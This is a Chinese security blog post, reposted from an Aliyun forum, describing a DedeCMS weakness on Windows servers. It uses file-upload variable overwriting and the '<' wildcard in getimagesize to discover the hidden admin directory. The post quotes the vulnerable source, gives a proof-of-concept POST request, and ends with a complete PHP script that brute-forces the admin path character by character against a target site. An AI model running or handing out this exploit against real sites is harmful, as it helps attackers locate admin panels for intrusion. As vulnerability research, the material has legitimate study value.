

<!DOCTYPE html>
<html lang="zh-CN" data-default-color-scheme=&#34;auto&#34;>



<head>
  <meta charset="UTF-8">
  <link rel="apple-touch-icon" sizes="76x76" href="/img/favicon.png">
  <link rel="icon" type="image/png" href="/img/favicon.png">
  <meta name="viewport"
        content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no, shrink-to-fit=no">
  <meta http-equiv="x-ua-compatible" content="ie=edge">
  
  <meta name="theme-color" content="#2f4154">
  <meta name="description" content="没有天生的大牛，更没有永远的菜鸟求知若饥 , 虚心若愚">
  <meta name="author" content="iceH">
  <meta name="keywords" content="">
  <title>解决DEDECMS历史难题--找后台目录 - iceH’s Blog</title>

  <link  rel="stylesheet" href="https://cdn.staticfile.org/twitter-bootstrap/4.5.3/css/bootstrap.min.css" />


  <link  rel="stylesheet" href="https://cdn.staticfile.org/github-markdown-css/4.0.0/github-markdown.min.css" />
  <link  rel="stylesheet" href="/lib/hint/hint.min.css" />

  
    
    
      
      <link  rel="stylesheet" href="https://cdn.staticfile.org/highlight.js/10.1.2/styles/github-gist.min.css" />
    
  

  
    <link  rel="stylesheet" href="https://cdn.staticfile.org/fancybox/3.5.7/jquery.fancybox.min.css" />
  



<!-- 主题依赖的图标库，不要自行修改 -->

<link rel="stylesheet" href="//at.alicdn.com/t/font_1749284_ba1fz6golrf.css">



<link rel="stylesheet" href="//at.alicdn.com/t/font_1736178_kmeydafke9r.css">


<link  rel="stylesheet" href="/css/main.css" />

<!-- 自定义样式保持在最底部 -->

  
<link rel="stylesheet" href="//cdn.jsdelivr.net/gh/bynotes/texiao/source/css/gundongtiao.css# 滚动条颜色.css">
<link rel="stylesheet" href="//cdn.jsdelivr.net/gh/bynotes/texiao/source/css/shubiao.css# 鼠标指针.css">
<link rel="stylesheet" href="//cdn.jsdelivr.net/npm/aplayer/dist/APlayer.min.css">



  <script id="fluid-configs">
    var Fluid = window.Fluid || {};
    var CONFIG = {"hostname":"www.secice.cn","root":"/","version":"1.8.5","typing":{"enable":true,"typeSpeed":70,"cursorChar":"_","loop":false},"toc":{"enable":true,"headingSelector":"h1,h2,h3,h4,h5,h6","collapseDepth":0},"anchorjs":{"enable":true,"element":"h1,h2,h3,h4,h5,h6","placement":"right","visible":"hover","icon":""},"copy_btn":true,"image_zoom":{"enable":true},"lazyload":{"enable":true,"onlypost":false},"web_analytics":{"enable":false,"baidu":null,"google":null,"gtag":null,"tencent":{"sid":null,"cid":null},"woyaola":null,"cnzz":null,"leancloud":{"app_id":null,"app_key":null,"server_url":null}}};
  </script>
  <script  src="/js/utils.js" ></script>
  <script  src="/js/color-schema.js" ></script>
<meta name="generator" content="Hexo 5.2.0"><link rel="alternate" href="/atom.xml" title="iceH’s Blog" type="application/atom+xml">
</head>


<body>
  <header style="height: 70vh;">
    <nav id="navbar" class="navbar fixed-top  navbar-expand-lg navbar-dark scrolling-navbar">
  <div class="container">
    <a class="navbar-brand"
       href="/">&nbsp;<strong>iceH's Blog</strong>&nbsp;</a>

    <button id="navbar-toggler-btn" class="navbar-toggler" type="button" data-toggle="collapse"
            data-target="#navbarSupportedContent"
            aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
      <div class="animated-icon"><span></span><span></span><span></span></div>
    </button>

    <!-- Collapsible content -->
    <div class="collapse navbar-collapse" id="navbarSupportedContent">
      <ul class="navbar-nav ml-auto text-center">
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/">
                <i class="iconfont icon-home-fill"></i>
                首页
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item dropdown">
              <a class="nav-link dropdown-toggle" href="#" role="button" data-toggle="dropdown" aria-haspopup="true" aria-expanded="false">
                <i class="iconfont icon-books"></i>
                博文
              </a>
              <div class="dropdown-menu" aria-labelledby="navbarDropdown">
                
                  
                  
                  
                  <a class="dropdown-item" href="/archives/">
                    <i class="iconfont icon-archive-fill"></i>
                    归档
                  </a>
                
                  
                  
                  
                  <a class="dropdown-item" href="/categories/">
                    <i class="iconfont icon-category-fill"></i>
                    分类
                  </a>
                
                  
                  
                  
                  <a class="dropdown-item" href="/tags/">
                    <i class="iconfont icon-tags-fill"></i>
                    标签
                  </a>
                
              </div>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/playlist/">
                <i class="iconfont icon-music"></i>
                音乐
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/about/">
                <i class="iconfont icon-user-fill"></i>
                关于
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/links/">
                <i class="iconfont icon-link-fill"></i>
                友链
              </a>
            </li>
          
        
        
          <li class="nav-item" id="search-btn">
            <a class="nav-link" data-toggle="modal" data-target="#modalSearch">&nbsp;<i
                class="iconfont icon-search"></i>&nbsp;</a>
          </li>
        
        
          <li class="nav-item" id="color-toggle-btn">
            <a class="nav-link" href="javascript:">&nbsp;<i
                class="iconfont icon-dark" id="color-toggle-icon"></i>&nbsp;</a>
          </li>
        
      </ul>
    </div>
  </div>
</nav>

    <div class="banner intro-2" id="background" parallax=true
         style="background: url('/img/default.png') no-repeat center center;
           background-size: cover;">
      <div class="full-bg-img">
        <div class="mask flex-center" style="background-color: rgba(0, 0, 0, 0.3)">
          <div class="page-header text-center fade-in-up">
            <span class="h2" id="subtitle" title="解决DEDECMS历史难题--找后台目录">
              
            </span>

            
              <div class="mt-3">
  
  
    <span class="post-meta">
      <i class="iconfont icon-date-fill" aria-hidden="true"></i>
      <time datetime="2018-02-26 11:51" pubdate>
        2018年2月26日 中午
      </time>
    </span>
  
</div>

<div class="mt-1">
  
    
    <span class="post-meta mr-2">
      <i class="iconfont icon-chart"></i>
      961 字
    </span>
  

  
    
    <span class="post-meta mr-2">
      <i class="iconfont icon-clock-fill"></i>
      
      
      15
       分钟
    </span>
  

  
  
</div>

            
          </div>

          
        </div>
      </div>
    </div>
  </header>

  <main>
    
      

<div class="container-fluid">
  <div class="row">
    <div class="d-none d-lg-block col-lg-2"></div>
    <div class="col-lg-8 nopadding-md">
      <div class="container nopadding-md" id="board-ctn">
        <div class="py-5" id="board">
          <article class="post-content mx-auto">
            <!-- SEO header -->
            <h1 style="display: none">解决DEDECMS历史难题--找后台目录</h1>
            
            <div class="markdown-body">
              <h3 id="利用限制"><a href="#利用限制" class="headerlink" title="利用限制"></a>利用限制</h3><ul>
<li>  仅针对windows系统</li>
</ul>
<h3 id="进入正题"><a href="#进入正题" class="headerlink" title="进入正题"></a>进入正题</h3><p>首先看核心文件common.inc.php 大概148行左右</p>
<pre><code class="hljs php"><span class="hljs-keyword">if</span>(<span class="hljs-variable">$_FILES</span>)
&#123;
    <span class="hljs-keyword">require_once</span>(DEDEINC.<span class="hljs-string">&#x27;/uploadsafe.inc.php&#x27;</span>);
&#125;</code></pre>

<a id="more"></a>

<p>uploadsafe.inc.php</p>
<pre><code class="hljs php"><span class="hljs-keyword">if</span>( preg_match(<span class="hljs-string">&#x27;#^(cfg_|GLOBALS)#&#x27;</span>, <span class="hljs-variable">$_key</span>) )
&#123;
    <span class="hljs-keyword">exit</span>(<span class="hljs-string">&#x27;Request var not allow for uploadsafe!&#x27;</span>);
&#125;
<span class="hljs-variable">$$_key</span> = <span class="hljs-variable">$_FILES</span>[<span class="hljs-variable">$_key</span>][<span class="hljs-string">&#x27;tmp_name&#x27;</span>]; <span class="hljs-comment">//获取temp_name </span>
$&#123;<span class="hljs-variable">$_key</span>.<span class="hljs-string">&#x27;_name&#x27;</span>&#125; = <span class="hljs-variable">$_FILES</span>[<span class="hljs-variable">$_key</span>][<span class="hljs-string">&#x27;name&#x27;</span>];
$&#123;<span class="hljs-variable">$_key</span>.<span class="hljs-string">&#x27;_type&#x27;</span>&#125; = <span class="hljs-variable">$_FILES</span>[<span class="hljs-variable">$_key</span>][<span class="hljs-string">&#x27;type&#x27;</span>] = preg_replace(<span class="hljs-string">&#x27;#[^0-9a-z\./]#i&#x27;</span>, <span class="hljs-string">&#x27;&#x27;</span>, <span class="hljs-variable">$_FILES</span>[<span class="hljs-variable">$_key</span>][<span class="hljs-string">&#x27;type&#x27;</span>]);
$&#123;<span class="hljs-variable">$_key</span>.<span class="hljs-string">&#x27;_size&#x27;</span>&#125; = <span class="hljs-variable">$_FILES</span>[<span class="hljs-variable">$_key</span>][<span class="hljs-string">&#x27;size&#x27;</span>] = preg_replace(<span class="hljs-string">&#x27;#[^0-9]#&#x27;</span>,<span class="hljs-string">&#x27;&#x27;</span>,<span class="hljs-variable">$_FILES</span>[<span class="hljs-variable">$_key</span>][<span class="hljs-string">&#x27;size&#x27;</span>]);
<span class="hljs-keyword">if</span>(!<span class="hljs-keyword">empty</span>($&#123;<span class="hljs-variable">$_key</span>.<span class="hljs-string">&#x27;_name&#x27;</span>&#125;) &amp;&amp; (preg_match(<span class="hljs-string">&quot;#\.(&quot;</span>.<span class="hljs-variable">$cfg_not_allowall</span>.<span class="hljs-string">&quot;)$#i&quot;</span>,$&#123;<span class="hljs-variable">$_key</span>.<span class="hljs-string">&#x27;_name&#x27;</span>&#125;) || !preg_match(<span class="hljs-string">&quot;#\.#&quot;</span>, $&#123;<span class="hljs-variable">$_key</span>.<span class="hljs-string">&#x27;_name&#x27;</span>&#125;)) )
&#123;
    <span class="hljs-keyword">if</span>(!defined(<span class="hljs-string">&#x27;DEDEADMIN&#x27;</span>))
    &#123;
        <span class="hljs-keyword">exit</span>(<span class="hljs-string">&#x27;Not Admin Upload filetype not allow !&#x27;</span>);
    &#125;
&#125;
<span class="hljs-keyword">if</span>(<span class="hljs-keyword">empty</span>($&#123;<span class="hljs-variable">$_key</span>.<span class="hljs-string">&#x27;_size&#x27;</span>&#125;))
&#123;
    $&#123;<span class="hljs-variable">$_key</span>.<span class="hljs-string">&#x27;_size&#x27;</span>&#125; = @filesize(<span class="hljs-variable">$$_key</span>);
&#125;
<span class="hljs-variable">$imtypes</span> = <span class="hljs-keyword">array</span>
(
    <span class="hljs-string">&quot;image/pjpeg&quot;</span>, <span class="hljs-string">&quot;image/jpeg&quot;</span>, <span class="hljs-string">&quot;image/gif&quot;</span>, <span class="hljs-string">&quot;image/png&quot;</span>, 
    <span class="hljs-string">&quot;image/xpng&quot;</span>, <span class="hljs-string">&quot;image/wbmp&quot;</span>, <span class="hljs-string">&quot;image/bmp&quot;</span>
);
<span class="hljs-keyword">if</span>(in_array(strtolower(trim($&#123;<span class="hljs-variable">$_key</span>.<span class="hljs-string">&#x27;_type&#x27;</span>&#125;)), <span class="hljs-variable">$imtypes</span>))
&#123;
    <span class="hljs-variable">$image_dd</span> = @getimagesize(<span class="hljs-variable">$$_key</span>); 
    <span class="hljs-comment">//问题就在这里，获取文件的size，获取不到说明不是图片或者图片不存在，不存就exit upload.... ,利用这个逻辑猜目录的前提是目录内有图片格式的文件。</span>
    <span class="hljs-keyword">if</span> (!is_array(<span class="hljs-variable">$image_dd</span>))
    &#123;
        <span class="hljs-keyword">exit</span>(<span class="hljs-string">&#x27;Upload filetype not allow !&#x27;</span>);
    &#125;
&#125;
......</code></pre>

<p>注意<code>$$_key</code>这一句，变量<code>$key</code>取自于<code>$_FILE</code>，由于<code>$_FILE</code>可控自然<code>$key</code>也可控,此处理论上是可以覆盖任意变量，但是前面有个正则判断不能出现<code>cfg_|GLOBALS</code>。(但是应该还可以覆盖其他变量此处感觉还可以深挖)</p>
<p>本人出发点是找个可以利用<code>&lt;&lt;</code>通配符猜解后台目录，所以只要<code>$$_key</code>参数可控就可以达到目的。</p>
<p>但在这之前有个<code>if(!defined(&#39;DEDEADMIN&#39;))</code>的判断,这个很好绕过设置<code>tmp_name为0或者1.jpg含.</code> 就可以绕过。</p>
<p>最后关键的一点就是要让文件存在还和不存在返回不同的内容就要控制type参数了。</p>
<p>当目录文件存在的时候 返回正常页面。当不存在的时候返回：Upload filetype not allow !</p>
<h3 id="举个例子"><a href="#举个例子" class="headerlink" title="举个例子"></a>举个例子</h3><p>文字不好表达，便于理解。</p>
<pre><code class="hljs php"><span class="hljs-meta">&lt;?php</span>
<span class="hljs-comment">// ./dedecms/favicon.ico</span>
<span class="hljs-keyword">if</span>(@getimagesize(<span class="hljs-variable">$_GET</span>[<span class="hljs-string">&#x27;poc&#x27;</span>]))&#123;
    <span class="hljs-keyword">echo</span> <span class="hljs-number">1</span>;
&#125;<span class="hljs-keyword">else</span> &#123;
    <span class="hljs-keyword">echo</span> <span class="hljs-number">0</span>;
&#125;
<span class="hljs-meta">?&gt;</span>
get:
http:<span class="hljs-comment">//localhost/test.php?poc=./d&lt;/favicon.ico</span>
返回：<span class="hljs-number">1</span>

http:<span class="hljs-comment">//localhost/test.php?poc=./a&lt;/favicon.ico</span>
返回：<span class="hljs-number">0</span>

http:<span class="hljs-comment">//localhost/test.php?poc=./de&lt;/favicon.ico</span>
返回：<span class="hljs-number">1</span>

http:<span class="hljs-comment">//localhost/test.php?poc=./ded&lt;/favicon.ico</span>
返回：<span class="hljs-number">1</span>

........</code></pre>

<h3 id="构造poc"><a href="#构造poc" class="headerlink" title="构造poc"></a>构造poc</h3><pre><code class="hljs sqf">http:<span class="hljs-comment">//localhost/dedecms/tags.php</span>

post:

dopost=save&amp;<span class="hljs-variable">_FILES</span>[b4dboy][tmp_name]=./de&lt;/images/admin_top_logo.gif&amp;<span class="hljs-variable">_FILES</span>[b4dboy][<span class="hljs-built_in">name</span>]=<span class="hljs-number">0</span>&amp;<span class="hljs-variable">_FILES</span>[b4dboy][<span class="hljs-built_in">size</span>]=<span class="hljs-number">0</span>&amp;<span class="hljs-variable">_FILES</span>[b4dboy][<span class="hljs-built_in">type</span>]=<span class="hljs-built_in">image</span>/gif</code></pre>

<p>Common.inc.php 是被全局包含的文件，只要文件php文件包含了Common.inc.php都可以进行测试，以tags.php文件为例</p>
<p>当目录存在点时候： </p>
<p><img src="/images/%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0/20180226_%E8%A7%A3%E5%86%B3DEDECMS%E5%8E%86%E5%8F%B2%E9%9A%BE%E9%A2%98--%E6%89%BE%E5%90%8E%E5%8F%B0%E7%9B%AE%E5%BD%95/01.png" srcset="/img/loading.gif" alt="解决DEDECMS历史难题--找后台目录"></p>
<p>当目录不存在点时候： </p>
<p><img src="/images/%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0/20180226_%E8%A7%A3%E5%86%B3DEDECMS%E5%8E%86%E5%8F%B2%E9%9A%BE%E9%A2%98--%E6%89%BE%E5%90%8E%E5%8F%B0%E7%9B%AE%E5%BD%95/02.png" srcset="/img/loading.gif" alt="解决DEDECMS历史难题--找后台目录"></p>
<h3 id="EXP："><a href="#EXP：" class="headerlink" title="EXP："></a>EXP：</h3><pre><code class="hljs php"><span class="hljs-meta">&lt;?php</span>
<span class="hljs-variable">$domain</span>=<span class="hljs-string">&#x27;http://localhost/dedecms/&#x27;</span>;
<span class="hljs-variable">$url</span>=<span class="hljs-variable">$domain</span>.<span class="hljs-string">&#x27;/index.php&#x27;</span>;
<span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">post</span>(<span class="hljs-params"><span class="hljs-variable">$url</span>, <span class="hljs-variable">$data</span>, <span class="hljs-variable">$cookie</span> = <span class="hljs-string">&#x27;&#x27;</span></span>) </span>&#123;
    <span class="hljs-variable">$options</span> = <span class="hljs-keyword">array</span>(
        CURLOPT_RETURNTRANSFER =&gt; <span class="hljs-literal">true</span>,
        CURLOPT_HEADER =&gt; <span class="hljs-literal">true</span>,
        CURLOPT_POST =&gt; <span class="hljs-literal">true</span>,
        CURLOPT_SSL_VERIFYHOST =&gt; <span class="hljs-literal">false</span>,
        CURLOPT_SSL_VERIFYHOST =&gt; <span class="hljs-literal">false</span>,
        CURLOPT_COOKIE =&gt; <span class="hljs-variable">$cookie</span>,
        CURLOPT_POSTFIELDS =&gt; <span class="hljs-variable">$data</span>,
    );
    <span class="hljs-variable">$ch</span> = curl_init(<span class="hljs-variable">$url</span>);
    curl_setopt_array(<span class="hljs-variable">$ch</span>, <span class="hljs-variable">$options</span>);
    <span class="hljs-variable">$result</span> = curl_exec(<span class="hljs-variable">$ch</span>);
    curl_close(<span class="hljs-variable">$ch</span>);
    <span class="hljs-keyword">return</span> <span class="hljs-variable">$result</span>;
&#125;
<span class="hljs-variable">$testlen</span>=<span class="hljs-number">25</span>;
<span class="hljs-variable">$str</span>=range(<span class="hljs-string">&#x27;a&#x27;</span>,<span class="hljs-string">&#x27;z&#x27;</span>);
<span class="hljs-variable">$number</span>=range(<span class="hljs-number">0</span>,<span class="hljs-number">9</span>,<span class="hljs-number">1</span>);
<span class="hljs-variable">$dic</span> = array_merge(<span class="hljs-variable">$str</span>, <span class="hljs-variable">$number</span>);
<span class="hljs-variable">$n</span>=<span class="hljs-literal">true</span>;
<span class="hljs-variable">$nn</span>=<span class="hljs-literal">true</span>;
<span class="hljs-variable">$path</span>=<span class="hljs-string">&#x27;&#x27;</span>;
<span class="hljs-keyword">while</span>(<span class="hljs-variable">$n</span>)&#123;
    <span class="hljs-keyword">foreach</span>(<span class="hljs-variable">$dic</span> <span class="hljs-keyword">as</span> <span class="hljs-variable">$v</span>)&#123;
        <span class="hljs-keyword">foreach</span>(<span class="hljs-variable">$dic</span> <span class="hljs-keyword">as</span> <span class="hljs-variable">$vv</span>)&#123;
            <span class="hljs-comment">#echo $v.$vv .&#x27;----&#x27;;</span>
            <span class="hljs-variable">$post_data</span>=<span class="hljs-string">&quot;dopost=save&amp;_FILES[b4dboy][tmp_name]=./<span class="hljs-subst">$v</span><span class="hljs-subst">$vv</span>&lt;/images/admin_top_logo.gif&amp;_FILES[b4dboy][name]=0&amp;_FILES[b4dboy][size]=0&amp;_FILES[b4dboy][type]=image/gif&quot;</span>;
            <span class="hljs-variable">$result</span>=post(<span class="hljs-variable">$url</span>,<span class="hljs-variable">$post_data</span>);
            <span class="hljs-keyword">if</span>(strpos(<span class="hljs-variable">$result</span>,<span class="hljs-string">&#x27;Upload filetype not allow !&#x27;</span>) === <span class="hljs-literal">false</span>)&#123;
                <span class="hljs-variable">$path</span>=<span class="hljs-variable">$v</span>.<span class="hljs-variable">$vv</span>;<span class="hljs-variable">$n</span>=<span class="hljs-literal">false</span>;<span class="hljs-keyword">break</span> <span class="hljs-number">2</span>;
            &#125;
        &#125;
    &#125;
&#125;
<span class="hljs-keyword">while</span>(<span class="hljs-variable">$nn</span>)&#123;
    <span class="hljs-keyword">foreach</span>(<span class="hljs-variable">$dic</span> <span class="hljs-keyword">as</span> <span class="hljs-variable">$vvv</span>)&#123;
        <span class="hljs-variable">$post_data</span>=<span class="hljs-string">&quot;dopost=save&amp;_FILES[b4dboy][tmp_name]=./<span class="hljs-subst">$path</span><span class="hljs-subst">$vvv</span>&lt;/images/admin_top_logo.gif&amp;_FILES[b4dboy][name]=0&amp;_FILES[b4dboy][size]=0&amp;_FILES[b4dboy][type]=image/gif&quot;</span>;
        <span class="hljs-variable">$result</span>=post(<span class="hljs-variable">$url</span>,<span class="hljs-variable">$post_data</span>);
        <span class="hljs-keyword">if</span>(strpos(<span class="hljs-variable">$result</span>,<span class="hljs-string">&#x27;Upload filetype not allow !&#x27;</span>) === <span class="hljs-literal">false</span>)&#123;
            <span class="hljs-variable">$path</span>.=<span class="hljs-variable">$vvv</span>;
            <span class="hljs-keyword">echo</span> <span class="hljs-variable">$path</span> . PHP_EOL;
            <span class="hljs-variable">$giturl</span>=<span class="hljs-variable">$domain</span>.<span class="hljs-string">&#x27;/&#x27;</span>.<span class="hljs-variable">$path</span>.<span class="hljs-string">&#x27;/images/admin_top_logo.gif&#x27;</span>;
            <span class="hljs-keyword">if</span>(@file_get_contents(<span class="hljs-variable">$giturl</span>))&#123;
                <span class="hljs-keyword">echo</span> <span class="hljs-variable">$domain</span>.<span class="hljs-string">&#x27;/&#x27;</span>.<span class="hljs-variable">$path</span>.<span class="hljs-string">&#x27;/&#x27;</span>;
                <span class="hljs-variable">$nn</span>=<span class="hljs-literal">false</span>;<span class="hljs-keyword">break</span> <span class="hljs-number">2</span>;
            &#125;
        &#125;
    &#125;
&#125;
<span class="hljs-meta">?&gt;</span></code></pre>

<p><img src="/images/%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0/20180226_%E8%A7%A3%E5%86%B3DEDECMS%E5%8E%86%E5%8F%B2%E9%9A%BE%E9%A2%98--%E6%89%BE%E5%90%8E%E5%8F%B0%E7%9B%AE%E5%BD%95/03.png" srcset="/img/loading.gif" alt="解决DEDECMS历史难题--找后台目录"></p>
<p>转载自：<a target="_blank" rel="noopener" href="https://xianzhi.aliyun.com/forum/topic/2064">https://xianzhi.aliyun.com/forum/topic/2064</a></p>

            </div>
            <hr>
            <div>
              <div class="post-metas mb-3">
                
                  <div class="post-meta mr-3">
                    <i class="iconfont icon-category"></i>
                    
                      <a class="hover-with-bg" href="/categories/%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0/">漏洞复现</a>
                    
                  </div>
                
                
                  <div class="post-meta">
                    <i class="iconfont icon-tags"></i>
                    
                      <a class="hover-with-bg" href="/tags/%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0/">漏洞复现</a>
                    
                  </div>
                
              </div>
              <p class="note note-warning">
              <strong>本文作者: </strong><a href="/">iceH</a> <br>
              <strong>本文链接: </strong><a href="http://www.secice.cn/post/40eeea0e">http://www.secice.cn/post/40eeea0e</a> <br>
              <strong>版权声明: </strong>本博客所有文章除特别声明外，均采用 <a target="_blank" href="https://creativecommons.org/licenses/by-sa/4.0/deed.zh" rel="nofollow noopener noopener">CC BY-SA 4.0 协议</a> ，转载请注明出处！
                 </p>
                 
              
                <div class="post-prevnext row">
                  <article class="post-prev col-6">
                    
                    
                      <a href="/post/83a0ea04">
                        <i class="iconfont icon-arrowleft"></i>
                        <span class="hidden-mobile">web漏洞合集描述和修复建议</span>
                        <span class="visible-mobile">上一篇</span>
                      </a>
                    
                  </article>
                  <article class="post-next col-6">
                    
                    
                      <a href="/post/a23ac9c4">
                        <span class="hidden-mobile">访问我的图片就获取你ip和访问地址</span>
                        <span class="visible-mobile">下一篇</span>
                        <i class="iconfont icon-arrowright"></i>
                      </a>
                    
                  </article>
                </div>
              
            </div>

            
          </article>
        </div>
      </div>
    </div>
    
      <div class="d-none d-lg-block col-lg-2 toc-container" id="toc-ctn">
        <div id="toc">
  <p class="toc-header"><i class="iconfont icon-list"></i>&nbsp;目录</p>
  <div class="toc-body" id="toc-body"></div>
</div>

      </div>
    
  </div>
</div>

<!-- Custom -->

  <div class="col-lg-7 mx-auto nopadding-md">
    <div class="container custom post-custom mx-auto">
      <img src="https://cdn.jsdelivr.net/gh/bynotes/bynotes.github.io/img/psb.gif" srcset="/img/loading.gif" class="rounded mx-auto d-block mt-5" style="width:300px; height:150px;">
    </div>
  </div>


    

    
      <a id="scroll-top-button" href="#" role="button">
        <i class="iconfont icon-arrowup" aria-hidden="true"></i>
      </a>
    

    
      <div class="modal fade" id="modalSearch" tabindex="-1" role="dialog" aria-labelledby="ModalLabel"
     aria-hidden="true">
  <div class="modal-dialog modal-dialog-scrollable modal-lg" role="document">
    <div class="modal-content">
      <div class="modal-header text-center">
        <h4 class="modal-title w-100 font-weight-bold">搜索</h4>
        <button type="button" id="local-search-close" class="close" data-dismiss="modal" aria-label="Close">
          <span aria-hidden="true">&times;</span>
        </button>
      </div>
      <div class="modal-body mx-3">
        <div class="md-form mb-5">
          <input type="text" id="local-search-input" class="form-control validate">
          <label data-error="x" data-success="v"
                 for="local-search-input">关键词</label>
        </div>
        <div class="list-group" id="local-search-result"></div>
      </div>
    </div>
  </div>
</div>
    

    
  </main>

  <footer class="text-center mt-5 py-3">
  <div class="footer-content">
     <span>iceH</span> <i class="iconfont icon-love"></i> <span>一条啥也不会的咸鱼！</span> 
  </div>
  

  

  
</footer>

<!-- SCRIPTS -->

  <script  src="https://cdn.staticfile.org/nprogress/0.2.0/nprogress.min.js" ></script>
  <link  rel="stylesheet" href="https://cdn.staticfile.org/nprogress/0.2.0/nprogress.min.css" />

  <script>
    NProgress.configure({"showSpinner":false,"trickleSpeed":200})
    NProgress.start()
    document.addEventListener('DOMContentLoaded', function() {
      window.NProgress && window.NProgress.inc();
    })
    window.addEventListener('load', function() {
      NProgress.done();
    })
  </script>


<script  src="https://cdn.staticfile.org/jquery/3.5.1/jquery.min.js" ></script>
<script  src="https://cdn.staticfile.org/twitter-bootstrap/4.5.3/js/bootstrap.min.js" ></script>
<script  src="/js/debouncer.js" ></script>
<script  src="/js/events.js" ></script>
<script  src="/js/plugins.js" ></script>

<!-- Plugins -->


  
    <script  src="/js/lazyload.js" ></script>
  



  



  <script  src="https://cdn.staticfile.org/tocbot/4.12.0/tocbot.min.js" ></script>



  <script  src="https://cdn.staticfile.org/fancybox/3.5.7/jquery.fancybox.min.js" ></script>



  <script  src="https://cdn.staticfile.org/anchor-js/4.3.0/anchor.min.js" ></script>



  <script defer src="https://cdn.staticfile.org/clipboard.js/2.0.6/clipboard.min.js" ></script>





  <script  src="https://cdn.staticfile.org/typed.js/2.0.11/typed.min.js" ></script>
  <script>
    (function (window, document) {
      var typing = Fluid.plugins.typing;
      var title = document.getElementById('subtitle').title;
      
      typing(title)
      
    })(window, document);
  </script>



  <script  src="/js/local-search.js" ></script>
  <script>
    (function () {
      var path = "/local-search.xml";
      var inputArea = document.querySelector("#local-search-input");
      inputArea.onclick = function () {
        searchFunc(path, 'local-search-input', 'local-search-result');
        this.onclick = null
      }
    })()
  </script>














  
<script src="//cdn.jsdelivr.net/gh/bynotes/texiao/source/js/qipao.js"></script>
<script src="//cdn.jsdelivr.net/gh/bynotes/texiao/source/js/jingtaisidai.js"></script>
<script src="//cdn.jsdelivr.net/gh/bynotes/texiao/source/js/dianjichuzi.js"></script>
<script src="//cdn.jsdelivr.net/npm/aplayer/dist/APlayer.min.js"></script>
<script src="//cdn.jsdelivr.net/gh/metowolf/MetingJS@1.2/dist/Meting.min.js"></script>



<!-- 主题的启动项 保持在最底部 -->
<script  src="/js/boot.js" ></script>



</body>
</html>